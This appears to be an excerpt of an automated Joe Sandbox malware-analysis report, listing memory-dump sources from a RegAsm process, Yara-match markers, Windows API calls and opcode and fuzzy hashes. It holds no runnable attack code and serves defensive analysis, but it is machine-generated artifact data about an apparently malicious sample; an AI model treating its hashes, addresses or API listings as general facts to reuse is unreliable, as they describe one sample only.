                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseCreateValue
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1818849710-0
                                                                                                                                        • Opcode ID: 8a000a4505fdb29c534fdcd469952580260528b50fc1865eb33bc02dff3d936a
                                                                                                                                        • Instruction ID: 04d77b696783773a8a307df6842786532c8303179302b097fa31242bc3118ae5
                                                                                                                                        • Opcode Fuzzy Hash: 8a000a4505fdb29c534fdcd469952580260528b50fc1865eb33bc02dff3d936a
                                                                                                                                        • Instruction Fuzzy Hash: 1EE06D72500318FBDF109FA0DC06FEA7BACEF04B62F104565BF09A6191D6358E14E7A8
                                                                                                                                        APIs
                                                                                                                                        • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 0044EE69
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Info
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1807457897-3916222277
                                                                                                                                        • Opcode ID: c218bb7fec2994ea758599c37fad7e7d2b1b4cc9144a8923480740bb4dc68c2e
                                                                                                                                        • Instruction ID: 2d4132b881e94a0a9fd0de77a922cbe9b4a8b8c61ff6a95216f325efaac8b060
                                                                                                                                        • Opcode Fuzzy Hash: c218bb7fec2994ea758599c37fad7e7d2b1b4cc9144a8923480740bb4dc68c2e
                                                                                                                                        • Instruction Fuzzy Hash: 7E411070504748AFEF218E25CC84AF7BBB9FF45304F2404EEE59987142D2399A46DF65
                                                                                                                                        APIs
                                                                                                                                        • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 10006AF0
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.874234704.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.874229194.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.874234704.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_10000000_RegAsm.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Info
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1807457897-3916222277
                                                                                                                                        • Opcode ID: 6cedc9456a51a48c8b79c853d380540c5183232597a17884e183f7c8afc1900e
                                                                                                                                        • Instruction ID: 7792c4a5177154c3e9ca344f7bd1be717728489360a1cc3eced530dab922c6d1
                                                                                                                                        • Opcode Fuzzy Hash: 6cedc9456a51a48c8b79c853d380540c5183232597a17884e183f7c8afc1900e
                                                                                                                                        • Instruction Fuzzy Hash: D241FCB050429C9AFB21CF148C84BEABBEAEB49344F2444EDE5C9C6146D735AA85DF20
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _wcslen
                                                                                                                                        • String ID: pQG
                                                                                                                                        • API String ID: 176396367-3769108836
                                                                                                                                        • Opcode ID: 5581d9da4b44419582c52f90d2dac08d2b870ca85f72c258eca40ba8ececd965
                                                                                                                                        • Instruction ID: e26466b944e621eef81fbe5db30e3e3b172770e45cde188e8c087a2518f8d89f
                                                                                                                                        • Opcode Fuzzy Hash: 5581d9da4b44419582c52f90d2dac08d2b870ca85f72c258eca40ba8ececd965
                                                                                                                                        • Instruction Fuzzy Hash: 631181319002059BCB15EF66E852AEF7BB4AF54314B10413FF446A62E2EF78AD15CB98
                                                                                                                                        APIs
                                                                                                                                        • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000001,?,?), ref: 00448CA4
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: String
                                                                                                                                        • String ID: LCMapStringEx
                                                                                                                                        • API String ID: 2568140703-3893581201
                                                                                                                                        • Opcode ID: 4e10c201ebb2099c74eb4779768ff64867bf24b434018514e16e99dc8bd4ef65
                                                                                                                                        • Instruction ID: c3f282dcf0fd97a5c368a601407465e3bede0a00add2935535d0592c00eac712
                                                                                                                                        • Opcode Fuzzy Hash: 4e10c201ebb2099c74eb4779768ff64867bf24b434018514e16e99dc8bd4ef65
                                                                                                                                        • Instruction Fuzzy Hash: 3001253254120CFBCF02AF91DD02EEE7F66EF08751F04416AFE1965161CA3A8971EB99
                                                                                                                                        APIs
                                                                                                                                        • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,5EFC4D8B,00000100,?,5EFC4D8B,00000000), ref: 10005F8A
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.874234704.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.874229194.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.874234704.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_10000000_RegAsm.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: String
                                                                                                                                        • String ID: LCMapStringEx
                                                                                                                                        • API String ID: 2568140703-3893581201
                                                                                                                                        • Opcode ID: 9311d150e09a2ea236c127db5a9a9399c35e1f3cdcd5bb094b510bbe54d2b48d
                                                                                                                                        • Instruction ID: 984c2aabb43d86beb2eff1d34daabde68608d0bd8f0a2971fe4c3ea005c0c61c
                                                                                                                                        • Opcode Fuzzy Hash: 9311d150e09a2ea236c127db5a9a9399c35e1f3cdcd5bb094b510bbe54d2b48d
                                                                                                                                        • Instruction Fuzzy Hash: 9401D332500159BBEF129F90CC05EEE7F66EF08390F018115FE1826124CB369971AB95
                                                                                                                                        APIs
                                                                                                                                        • InitializeCriticalSectionAndSpinCount.KERNEL32(00000FA0,-00000020,0044BFCF,-00000020,00000FA0,00000000,00467388,00467388), ref: 00448B4F
                                                                                                                                        Strings
                                                                                                                                        • InitializeCriticalSectionEx, xrefs: 00448B1F
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CountCriticalInitializeSectionSpin
                                                                                                                                        • String ID: InitializeCriticalSectionEx
                                                                                                                                        • API String ID: 2593887523-3084827643
                                                                                                                                        • Opcode ID: 6340ef5d4d263af2985355ee658efc66a6ef890db148a952ff0e7e01781af4fe
                                                                                                                                        • Instruction ID: 6b0d226957fc5e3530c80ec385177705bb254131620a7d42d33c8bf65efe755d
                                                                                                                                        • Opcode Fuzzy Hash: 6340ef5d4d263af2985355ee658efc66a6ef890db148a952ff0e7e01781af4fe
                                                                                                                                        • Instruction Fuzzy Hash: F0F0E93164021CFBCB025F55DC06E9E7F61EF08B22B00406AFD0956261DF3A9E61D6DD
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Alloc
                                                                                                                                        • String ID: FlsAlloc
                                                                                                                                        • API String ID: 2773662609-671089009
                                                                                                                                        • Opcode ID: 8d34d378e792ffc8bee28f5c2a12e2aa67d49de27489c3fe41b8e68b567a8336
                                                                                                                                        • Instruction ID: f8901b274c9ac7999680b04b2037e580393277d5e39e0d99f0e7f02c98ef4e36
                                                                                                                                        • Opcode Fuzzy Hash: 8d34d378e792ffc8bee28f5c2a12e2aa67d49de27489c3fe41b8e68b567a8336
                                                                                                                                        • Instruction Fuzzy Hash: 8FE05530640318F7D3016B21DC16A2FBB94DB04B22B10006FFD0553241EE794D15C5CE
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.874234704.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.874229194.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.874234704.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_10000000_RegAsm.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Alloc
                                                                                                                                        • String ID: FlsAlloc
                                                                                                                                        • API String ID: 2773662609-671089009
                                                                                                                                        • Opcode ID: 5ade6ed448300679f83b5d20ac83fd3ad7347746afaf7e54a560ff76d56e46a0
                                                                                                                                        • Instruction ID: c304bc83fd0672a576945d725d7c66755e55876121cef6cfa1c70df20931aaa1
                                                                                                                                        • Opcode Fuzzy Hash: 5ade6ed448300679f83b5d20ac83fd3ad7347746afaf7e54a560ff76d56e46a0
                                                                                                                                        • Instruction Fuzzy Hash: 43E0E535600228ABF325EB608C15EEFBBA4DB583D1B01405AFE0966209CE326D0185D6
                                                                                                                                        APIs
                                                                                                                                        • try_get_function.LIBVCRUNTIME ref: 00438E29
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: try_get_function
                                                                                                                                        • String ID: FlsAlloc
                                                                                                                                        • API String ID: 2742660187-671089009
                                                                                                                                        • Opcode ID: 1eb4f256e7c4e0b4dee7f2b7c001ffdd8c026b266bbfd6c5aa47d90a079f9e5b
                                                                                                                                        • Instruction ID: b64d3ab94c56a33c1928a034b10f94234fe941941be7f39555266fb58f36a209
                                                                                                                                        • Opcode Fuzzy Hash: 1eb4f256e7c4e0b4dee7f2b7c001ffdd8c026b266bbfd6c5aa47d90a079f9e5b
                                                                                                                                        • Instruction Fuzzy Hash: 09D02B31BC1328B6C51032955C03BD9B6048B00FF7F002067FF0C61283899E592082DE
                                                                                                                                        APIs
                                                                                                                                        • try_get_function.LIBVCRUNTIME ref: 10003B06
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.874234704.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.874229194.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.874234704.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_10000000_RegAsm.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: try_get_function
                                                                                                                                        • String ID: FlsAlloc
                                                                                                                                        • API String ID: 2742660187-671089009
                                                                                                                                        • Opcode ID: e5392f9aa55551a50589cb99c6148b67437594651e03cd2756b54b563a9e1daf
                                                                                                                                        • Instruction ID: 0b7c7f44018c04906f4f2ef9afae3f4f684564eee465a9a4c05fe82f6616737e
                                                                                                                                        • Opcode Fuzzy Hash: e5392f9aa55551a50589cb99c6148b67437594651e03cd2756b54b563a9e1daf
                                                                                                                                        • Instruction Fuzzy Hash: 13D02B32744138B3F201B3A06C04BEEBB88D7025F2F040063FB4C5210CDB11591042E6
                                                                                                                                        APIs
                                                                                                                                        • GlobalMemoryStatusEx.KERNEL32(?), ref: 0041B85B
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: GlobalMemoryStatus
                                                                                                                                        • String ID: @
                                                                                                                                        • API String ID: 1890195054-2766056989
                                                                                                                                        • Opcode ID: 2ff32e62116e468e6d8a54eb6c0bfd9d688f6c12eac0596ef65494206548ed21
                                                                                                                                        • Instruction ID: 2d2b64c70bc766df394076410504e3f9c8f669937c614d63c6700d8895b1c70c
                                                                                                                                        • Opcode Fuzzy Hash: 2ff32e62116e468e6d8a54eb6c0bfd9d688f6c12eac0596ef65494206548ed21
                                                                                                                                        • Instruction Fuzzy Hash: E6D017B58023189FC720DFA8E804A8DBBFCFB08210F00456AEC49E3700E770E8008B94
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0044ED6C: GetOEMCP.KERNEL32(00000000,?,?,0044EFF5,?), ref: 0044ED97
                                                                                                                                        • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,0044F03A,?,00000000), ref: 0044F20D
                                                                                                                                        • GetCPInfo.KERNEL32(00000000,0044F03A,?,?,?,0044F03A,?,00000000), ref: 0044F220
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CodeInfoPageValid
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 546120528-0
                                                                                                                                        • Opcode ID: 747d95ecf2005c527016839393fb107aa8d78a19bbf0a74999b8906be39dfc0a
                                                                                                                                        • Instruction ID: 491245c4813b68437391e3e70942b885a5b84425ef1b1be509cf98dd56c33fdc
                                                                                                                                        • Opcode Fuzzy Hash: 747d95ecf2005c527016839393fb107aa8d78a19bbf0a74999b8906be39dfc0a
                                                                                                                                        • Instruction Fuzzy Hash: A05153749002469EFB208F76C8816BBBBE4FF01304F1480BFD48687251E67E994A8B99
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 100069F3: GetOEMCP.KERNEL32(00000000,?,?,10006C7C,?), ref: 10006A1E
                                                                                                                                        • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,10006CC1,?,00000000), ref: 10006E94
                                                                                                                                        • GetCPInfo.KERNEL32(00000000,10006CC1,?,?,?,10006CC1,?,00000000), ref: 10006EA7
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.874234704.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.874229194.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.874234704.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_10000000_RegAsm.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CodeInfoPageValid
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 546120528-0
                                                                                                                                        • Opcode ID: 4adf61bb8ef5ba689b58ef35b1aaecca0a92cbb4d0ae1edbfb61d6a665a170f3
                                                                                                                                        • Instruction ID: 1dd91d3823b6bb4934ca9945ee4913e93bf289da146d72ec34fd0236562290e4
                                                                                                                                        • Opcode Fuzzy Hash: 4adf61bb8ef5ba689b58ef35b1aaecca0a92cbb4d0ae1edbfb61d6a665a170f3
                                                                                                                                        • Instruction Fuzzy Hash: 91513474E043469EFB21CF71DC916BBBBE6EF49280F20807EE48687156D735DA458B90
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                                                                                          • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                                                                                          • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                                                                                          • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                                                                                          • Part of subcall function 0044F0F7: _abort.LIBCMT ref: 0044F129
                                                                                                                                          • Part of subcall function 0044F0F7: _free.LIBCMT ref: 0044F15D
                                                                                                                                          • Part of subcall function 0044ED6C: GetOEMCP.KERNEL32(00000000,?,?,0044EFF5,?), ref: 0044ED97
                                                                                                                                        • _free.LIBCMT ref: 0044F050
                                                                                                                                        • _free.LIBCMT ref: 0044F086
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _free$ErrorLast_abort
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2991157371-0
                                                                                                                                        • Opcode ID: b0ee2aee4096bb997892b4dec28a89a25a1db6387992807ccb6f750b77acbdfb
                                                                                                                                        • Instruction ID: a9f826519387c1ac895116d2974c89b4af6d1f604a138ae73dd4863203302c4b
                                                                                                                                        • Opcode Fuzzy Hash: b0ee2aee4096bb997892b4dec28a89a25a1db6387992807ccb6f750b77acbdfb
                                                                                                                                        • Instruction Fuzzy Hash: 2D31D371900104AFEB10EB69D441B9A77F4EF81325F2540AFE5049B2A3DB7A5D44CB58
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 10005AF6: GetLastError.KERNEL32(?,?,10006C6C), ref: 10005AFA
                                                                                                                                          • Part of subcall function 10005AF6: _free.LIBCMT ref: 10005B2D
                                                                                                                                          • Part of subcall function 10005AF6: SetLastError.KERNEL32(00000000,?,?,10006C6C), ref: 10005B6E
                                                                                                                                          • Part of subcall function 10005AF6: _abort.LIBCMT ref: 10005B74
                                                                                                                                          • Part of subcall function 10006D7E: _abort.LIBCMT ref: 10006DB0
                                                                                                                                          • Part of subcall function 10006D7E: _free.LIBCMT ref: 10006DE4
                                                                                                                                          • Part of subcall function 100069F3: GetOEMCP.KERNEL32(00000000,?,?,10006C7C,?), ref: 10006A1E
                                                                                                                                        • _free.LIBCMT ref: 10006CD7
                                                                                                                                        • _free.LIBCMT ref: 10006D0D
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.874234704.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.874229194.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.874234704.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_10000000_RegAsm.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _free$ErrorLast_abort
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2991157371-0
                                                                                                                                        • Opcode ID: edadbe4ca17b1bb3a790d59a6ed19414cc5eb62636eebdfc00c28812a33e9cae
                                                                                                                                        • Instruction ID: 62e76a57c0cb8018fa5258269fd2d3c97d0f5aa08c1c35bbbea2ca126a332e06
                                                                                                                                        • Opcode Fuzzy Hash: edadbe4ca17b1bb3a790d59a6ed19414cc5eb62636eebdfc00c28812a33e9cae
                                                                                                                                        • Instruction Fuzzy Hash: AB31D835904249AFF700CB69DD81B5D77F6EF493A0F3141A9E8049B295EB76AD40CB50
                                                                                                                                        APIs
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,?,00000000,00000000,00000000,?,004488B9,00000006,FlsSetValue,0045F170,0045F178,00000000,00000364,?,00448367,00000000), ref: 004485AA
                                                                                                                                        • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 004485B7
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressProc__crt_fast_encode_pointer
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2279764990-0
                                                                                                                                        • Opcode ID: c6cf5396499d17f56fb6a2281c71017d1bec5fc69850f55703e39bd70672811c
                                                                                                                                        • Instruction ID: be9fc4cf4793659cabcfb8eeb6b3f823a3a139bea871a56029073562aa2b3f0c
                                                                                                                                        • Opcode Fuzzy Hash: c6cf5396499d17f56fb6a2281c71017d1bec5fc69850f55703e39bd70672811c
                                                                                                                                        • Instruction Fuzzy Hash: 4B110637A00220BBFB229F1DDC4096F7395AB84364716866AFD19EB354DF34EC4186D9
                                                                                                                                        APIs
                                                                                                                                        • _free.LIBCMT ref: 00446227
                                                                                                                                          • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                                                                                                                        • HeapReAlloc.KERNEL32(00000000,00000000,?,?,0000000F,00000000,00432F93,00000000,0000000F,0042F99D,?,?,00431A44,?,?,00000000), ref: 00446263
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Heap$AllocAllocate_free
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2447670028-0
                                                                                                                                        • Opcode ID: b157f1fc507fc560bd00b565224a750c722b28025775eaa04a87fd2772ac9c2e
                                                                                                                                        • Instruction ID: 528349031ecf72c594af6ac828cc426c74ce8c7b4bfa82022820746e0f177899
                                                                                                                                        • Opcode Fuzzy Hash: b157f1fc507fc560bd00b565224a750c722b28025775eaa04a87fd2772ac9c2e
                                                                                                                                        • Instruction Fuzzy Hash: 4CF0283110121176BB213B266C01B6B3759AF83B70B1700ABFC1466281CFBCCC41406F
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: e70bc1220f3c0aaa69c113e67994fb024de36f7e04ed45e289cd83dd41bab85d
                                                                                                                                        • Instruction ID: 1e9d0a06bdb6e9f7b23a96960dfc4b712b0be9606a3b942e14a6d4fe6a34620f
                                                                                                                                        • Opcode Fuzzy Hash: e70bc1220f3c0aaa69c113e67994fb024de36f7e04ed45e289cd83dd41bab85d
                                                                                                                                        • Instruction Fuzzy Hash: EBF0E2706042016BCB0C8B34CD50B2A37954B84325F248F7FF02BD61E0C73EC8918A0D
                                                                                                                                        APIs
                                                                                                                                        • dllmain_crt_process_attach.LIBCMT ref: 10001F22
                                                                                                                                        • dllmain_crt_process_detach.LIBCMT ref: 10001F35
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.874234704.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.874229194.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.874234704.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_10000000_RegAsm.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: dllmain_crt_process_attachdllmain_crt_process_detach
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3750050125-0
                                                                                                                                        • Opcode ID: a083a93b774f70b3c38eb0fc97558fdcbb4f7ca7475fb23d15f98f17c44c9911
                                                                                                                                        • Instruction ID: 876e10da87b92cf64c449b9c471687dd08192407587f6dd1e67cbf7e6a41b987
                                                                                                                                        • Opcode Fuzzy Hash: a083a93b774f70b3c38eb0fc97558fdcbb4f7ca7475fb23d15f98f17c44c9911
